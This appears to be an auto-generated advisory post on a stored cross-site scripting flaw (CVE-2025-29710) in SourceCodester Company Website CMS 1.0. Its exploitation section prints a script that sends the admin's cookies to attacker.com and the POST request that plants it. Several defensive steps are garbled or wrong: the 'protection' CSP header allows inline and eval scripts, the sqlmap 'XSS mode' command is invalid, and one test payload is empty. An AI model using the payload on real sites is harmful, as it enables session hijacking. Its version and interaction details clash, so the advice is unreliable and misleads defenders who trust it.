SourceCodester Company Website CMS 10, Cross-Site Scripting (XSS), CVE-2025-29710 (Critical)

By /

Listen to this Post

How the CVE Works

CVE-2025-29710 is a stored Cross-Site Scripting (XSS) vulnerability in SourceCodester Company Website CMS 1.0. The flaw exists in the `/dashboard/Services` endpoint, where user-supplied input is improperly sanitized before being rendered in the dashboard. An attacker can inject malicious JavaScript payloads through crafted service entries, which are then executed when an admin views the affected service list. Since the dashboard is an authenticated area, this leads to privilege escalation, session hijacking, or backend exploitation. The attack requires no user interaction once stored, making it critical.

DailyCVE Form

Platform: SourceCodester CMS
Version: 1.0
Vulnerability: Stored XSS
Severity: Critical
Date: 04/23/2025

What Undercode Say:

Exploitation

1. Craft Malicious Payload:

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

2. Inject via Services:

POST /dashboard/Services HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
service_name=<malicious_script>&submit=Save

3. Trigger Execution: Admin visits /dashboard/Services, executing the payload.

Protection

1. Input Sanitization:

$service_name = htmlspecialchars($_POST['service_name'], ENT_QUOTES, 'UTF-8');

2. CSP Header:

Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'

3. Patch Update: Upgrade to patched version.

Detection

1. Scan with SQLMap (XSS Mode):

sqlmap -u "http://target.com/dashboard/Services" --forms --crawl=1 --risk=3 --level=5 --technique=XSS

2. Manual Testing: Submit `` and check for execution.

Log Analysis

Check Apache logs for repeated XSS attempts:

grep -i "script" /var/log/apache2/access.log | awk '{print $1, $7}'

Mitigation Commands

1. WAF Rule (ModSecurity):

SecRule ARGS "@contains <script>" "id:1005,deny,status:403,msg:'XSS Attempt'"

2. Disable Vulnerable Endpoint:

sudo a2dissite dashboard.conf && systemctl reload apache2

References

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29710
  • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29710

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top